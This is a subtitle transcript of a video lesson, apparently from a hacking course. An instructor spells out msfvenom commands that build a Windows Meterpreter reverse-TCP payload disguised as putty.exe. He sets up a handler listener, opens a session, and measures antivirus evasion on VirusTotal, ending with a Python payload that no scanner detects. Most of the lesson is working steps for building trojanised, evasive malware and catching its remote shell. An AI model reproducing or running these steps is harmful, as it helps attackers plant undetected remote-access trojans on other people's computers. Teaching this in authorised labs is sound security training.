1
00:00:01,020 --> 00:00:03,900
Instructor: And here it is, the scan has finished.

2
00:00:03,900 --> 00:00:08,039
Right now, we get the number of 38 out of 67.

3
00:00:08,039 --> 00:00:10,290
So we successfully managed to bypass

4
00:00:10,290 --> 00:00:12,900
five additional antivirus softwares

5
00:00:12,900 --> 00:00:15,360
using the additional commands that we added

6
00:00:15,360 --> 00:00:17,463
to our msfvenom payload.

7
00:00:18,630 --> 00:00:22,140
However, let's try to make it even less than this,

8
00:00:22,140 --> 00:00:24,360
just by using the msfvenom.

9
00:00:24,360 --> 00:00:26,580
There is another option that we can do

10
00:00:26,580 --> 00:00:28,860
which is -x.

11
00:00:28,860 --> 00:00:31,800
And if we go to the help menu right here,

12
00:00:31,800 --> 00:00:35,223
we can see that -x stands for template.

13
00:00:36,510 --> 00:00:40,290
-x allows us to use another program as its template.

14
00:00:40,290 --> 00:00:41,610
In other words, this means

15
00:00:41,610 --> 00:00:44,040
we can make our payload look similar

16
00:00:44,040 --> 00:00:45,453
to that other program.

17
00:00:46,350 --> 00:00:48,630
Now this is sometimes known not to work,

18
00:00:48,630 --> 00:00:49,710
but let's give it a try

19
00:00:49,710 --> 00:00:50,790
and see whether we manage

20
00:00:50,790 --> 00:00:53,493
to bypass more antiviruses with this.

21
00:00:54,690 --> 00:00:56,790
For this, we can use any program that we want.

22
00:00:56,790 --> 00:01:00,390
I'm going to go with the program called PuTTY.

23
00:01:00,390 --> 00:01:03,273
So I'm going to go right here and type putty.

24
00:01:04,560 --> 00:01:07,590
You can use any other executable file that you want.

25
00:01:07,590 --> 00:01:09,270
And under the download PuTTY,

26
00:01:09,270 --> 00:01:10,653
I will click on that link.

27
00:01:11,490 --> 00:01:13,380
It tells me you can download PuTTY here.
28
00:01:13,380 --> 00:01:14,583
I will click on here,

29
00:01:15,480 --> 00:01:17,490
and if I go all the way down,

30
00:01:17,490 --> 00:01:20,790
I am searching for the executable file, so .exe.

31
00:01:20,790 --> 00:01:24,060
And here it is, 64-bit putty.exe.

32
00:01:24,060 --> 00:01:25,560
I will click on this,

33
00:01:25,560 --> 00:01:28,263
and I will save it in my downloads folder.

34
00:01:29,280 --> 00:01:30,113
Great.

35
00:01:30,113 --> 00:01:30,990
I will click on okay.

36
00:01:30,990 --> 00:01:34,350
And if I go right here, open the downloads folder,

37
00:01:34,350 --> 00:01:37,140
here I will have the PuTTY executable.

38
00:01:37,140 --> 00:01:39,360
And just in case you don't know,

39
00:01:39,360 --> 00:01:42,603
on Windows, the PuTTY executable looks like this.

40
00:01:43,980 --> 00:01:48,180
So it has this icon and it is called putty.exe.

41
00:01:48,180 --> 00:01:49,380
Remember how it looks.

42
00:01:49,380 --> 00:01:51,330
Let me just delete it real quick,

43
00:01:51,330 --> 00:01:54,153
and I will open Terminal in my downloads folder,

44
00:01:55,290 --> 00:01:57,133
and run the command msfvenom -p.

45
00:01:58,626 --> 00:02:03,626
I will use the 64-bit meterpreter/reverse_tcp.

46
00:02:03,635 --> 00:02:06,545
LHOST will be 192.168.1.12.

47
00:02:06,545 --> 00:02:08,699
LPORT will be equal to 5555.

48
00:02:08,699 --> 00:02:11,730
And I will only add the -x option

49
00:02:11,730 --> 00:02:15,300
and select the program of putty.exe.

50
00:02:15,300 --> 00:02:17,070
Now if you're using some other executable,

51
00:02:17,070 --> 00:02:19,890
here specify the name of the other executable.

52
00:02:19,890 --> 00:02:23,430
Just make sure that you're located in the same directory

53
00:02:23,430 --> 00:02:25,890
where that executable file is

54
00:02:25,890 --> 00:02:28,050
in order to run this command.
55
00:02:28,050 --> 00:02:31,650
After that I can specify that it is format of exe,

56
00:02:31,650 --> 00:02:35,673
and output will be Putty.exe.

57
00:02:36,510 --> 00:02:37,443
Press enter.

58
00:02:38,880 --> 00:02:40,920
So the creation of the payload has finished,

59
00:02:40,920 --> 00:02:44,280
and if I go and show you what the payload looks like

60
00:02:44,280 --> 00:02:45,543
on the Windows machine.

61
00:02:46,530 --> 00:02:48,450
Let me just find this.

62
00:02:48,450 --> 00:02:51,780
And if I go and copy the Putty with the capital P

63
00:02:51,780 --> 00:02:52,803
to my desktop,

64
00:02:53,760 --> 00:02:56,310
here we can see it looks exactly the same

65
00:02:56,310 --> 00:02:58,230
as the previous file that I showed you.

66
00:02:58,230 --> 00:03:01,650
Just in case, this is our Meterpreter shell.

67
00:03:01,650 --> 00:03:03,060
Let me show you real quick.

68
00:03:03,060 --> 00:03:07,020
If I go and open msfconsole

69
00:03:07,020 --> 00:03:09,780
and I set up the multi/handle listener.

70
00:03:09,780 --> 00:03:11,790
So multi/handler.

71
00:03:11,790 --> 00:03:12,960
Set payload to be

72
00:03:12,960 --> 00:03:17,960
windows/x64/meterpreter/reverse_tcp.

73
00:03:20,910 --> 00:03:23,907
Set LHOST to be 192.168.1.12.

74
00:03:23,907 --> 00:03:27,510
And set LPORT to be 5555.

75
00:03:27,510 --> 00:03:29,520
I type run here,

76
00:03:29,520 --> 00:03:32,760
and then I run this putty.exe,

77
00:03:32,760 --> 00:03:34,110
go back to my Kali Linux,

78
00:03:34,110 --> 00:03:37,080
and we will have the Meterpreter session one opened.

79
00:03:37,080 --> 00:03:38,790
Get user ID will tell me

80
00:03:38,790 --> 00:03:41,700
that I am this Windows 10 machine.

81
00:03:41,700 --> 00:03:42,533
Okay, great.

82
00:03:42,533 --> 00:03:45,210
But this is out of the scope for this video.

83
00:03:45,210 --> 00:03:48,690
Let us check out what detection rate

84
00:03:48,690 --> 00:03:51,930
this newly generated payload has.
85
00:03:51,930 --> 00:03:53,220
So let's go right here.

86
00:03:53,220 --> 00:03:55,830
Choose file, navigate to downloads,

87
00:03:55,830 --> 00:03:58,830
because that is where our putty.exe is.

88
00:03:58,830 --> 00:04:02,163
Select the payload and confirm upload.

89
00:04:03,210 --> 00:04:06,450
And let's see if we generate the payload with the template.

90
00:04:06,450 --> 00:04:08,850
Do we manage to bypass more antiviruses

91
00:04:08,850 --> 00:04:11,550
than with the previous two payloads?

92
00:04:11,550 --> 00:04:14,100
And it seems that we do.

93
00:04:14,100 --> 00:04:17,910
In the previous one, we had 38 out of 67.

94
00:04:17,910 --> 00:04:21,300
Right now, we have 29 out of 69.

95
00:04:21,300 --> 00:04:25,590
So we managed to bypass eight additional antivirus vendors.

96
00:04:25,590 --> 00:04:26,423
Great.

97
00:04:26,423 --> 00:04:28,560
This looks better than the last two.

98
00:04:28,560 --> 00:04:30,570
I'm going to control C this,

99
00:04:30,570 --> 00:04:31,710
or just close this.

100
00:04:31,710 --> 00:04:33,900
And of course, if you wanted to generate

101
00:04:33,900 --> 00:04:36,720
a fully undetectable payload with msfvenom,

102
00:04:36,720 --> 00:04:39,060
you can always change the file format.

103
00:04:39,060 --> 00:04:41,430
But that comes with other problems.

104
00:04:41,430 --> 00:04:43,080
Let me show you real quick.

105
00:04:43,080 --> 00:04:45,240
So if I go right here under downloads

106
00:04:45,240 --> 00:04:48,150
and let's say we wanted to generate a Windows payload,

107
00:04:48,150 --> 00:04:50,040
but not as an EXE file,

108
00:04:50,040 --> 00:04:51,720
but as a Python file.

109
00:04:51,720 --> 00:04:52,770
We can run the command

110
00:04:52,770 --> 00:04:57,770
msfvenom -p windows/x64/meterpreter/reverse_tcp.

111
00:05:04,537 --> 00:05:05,857
LHOST equals 192.168.1.12.

112
00:05:06,968 --> 00:05:08,883
LPORT equals 5555.
113
00:05:09,750 --> 00:05:11,490
-f is something that we want to change,

114
00:05:11,490 --> 00:05:13,370
so it is no longer going to be EXE,

115
00:05:13,370 --> 00:05:16,140
it is going to be a Python file.

116
00:05:16,140 --> 00:05:20,800
And we output it with -o as python_payload.py

117
00:05:23,310 --> 00:05:24,360
Press enter,

118
00:05:24,360 --> 00:05:27,600
and this will create the Windows Meterpreter payload

119
00:05:27,600 --> 00:05:29,253
just as a Python file.

120
00:05:30,090 --> 00:05:31,620
Here it is, it is done.

121
00:05:31,620 --> 00:05:33,840
And if we go to VirusTotal,

122
00:05:33,840 --> 00:05:36,780
upload the Python payload, right here,

123
00:05:36,780 --> 00:05:38,760
confirm the upload,

124
00:05:38,760 --> 00:05:42,480
and we can see no antivirus is able to detect it

125
00:05:42,480 --> 00:05:44,070
as a malicious program.

126
00:05:44,070 --> 00:05:46,920
It is FUD, or in other words,

127
00:05:46,920 --> 00:05:50,220
it is a fully undetectable payload.

128
00:05:50,220 --> 00:05:53,910
However, how are you going to run it on the target machine?

129
00:05:53,910 --> 00:05:57,030
Windows machines don't have Python installed by default

130
00:05:57,030 --> 00:05:58,830
like Linux machines do.

131
00:05:58,830 --> 00:06:01,170
So this payload would only be useful

132
00:06:01,170 --> 00:06:04,200
if the target machine has Python installed.

133
00:06:04,200 --> 00:06:06,030
Otherwise it is completely useless,

134
00:06:06,030 --> 00:06:08,403
as it cannot run without Python.

135
00:06:09,510 --> 00:06:10,740
Okay, great.

136
00:06:10,740 --> 00:06:13,740
We covered msfvenom and some of its commands.

137
00:06:13,740 --> 00:06:16,500
I advise you to experiment even more with msfvenom,

138
00:06:16,500 --> 00:06:17,580
and for example,

139
00:06:17,580 --> 00:06:20,520
you can start creating other payloads if you want.
140
00:06:20,520 --> 00:06:22,200
We only created Windows payloads,

141
00:06:22,200 --> 00:06:24,990
but if you have a Linux machine or a macOS machine

142
00:06:24,990 --> 00:06:26,280
that you want to attack,

143
00:06:26,280 --> 00:06:27,420
you can generate payloads

144
00:06:27,420 --> 00:06:30,270
for those operating systems as well.

145
00:06:30,270 --> 00:06:31,920
To check out all the available payloads

146
00:06:31,920 --> 00:06:32,970
that you can create,

147
00:06:32,970 --> 00:06:35,730
you can type the command right here,

148
00:06:35,730 --> 00:06:40,730
msfvenom --list and then payloads.

149
00:06:41,160 --> 00:06:44,040
And here we can see a lot of different ones.

150
00:06:44,040 --> 00:06:46,650
We can go up here, here are only Windows payloads,

151
00:06:46,650 --> 00:06:48,753
but if we scroll all the way up,

152
00:06:50,010 --> 00:06:52,560
here are Solaris payloads, Ruby payloads,

153
00:06:52,560 --> 00:06:54,960
and these are just some programming languages.

154
00:06:54,960 --> 00:06:57,060
But here, if we scroll all the way up,

155
00:06:57,060 --> 00:06:59,040
we get to the osx payloads.

156
00:06:59,040 --> 00:07:01,800
So you can attack OS X operating systems.

157
00:07:01,800 --> 00:07:04,770
If we go even more up, here are Linux operating systems

158
00:07:04,770 --> 00:07:08,070
and Linux meterpreter_reverse_tcp payloads.

159
00:07:08,070 --> 00:07:10,770
We also get the bind shell payloads.

160
00:07:10,770 --> 00:07:12,390
We get up here the Linux payloads

161
00:07:12,390 --> 00:07:14,670
for the 64-bit systems as well.

162
00:07:14,670 --> 00:07:17,523
So you can attack any operating system that you want.

163
00:07:18,600 --> 00:07:19,433
Great.
164
00:07:19,433 --> 00:07:21,210
Now that we took a look at msfvenom,

165
00:07:21,210 --> 00:07:23,400
and we covered some of its options,

166
00:07:23,400 --> 00:07:26,100
let's also take a look at some other tools

167
00:07:26,100 --> 00:07:28,440
that we can use for payload creation.

168
00:07:28,440 --> 00:07:29,740
See you in the next video.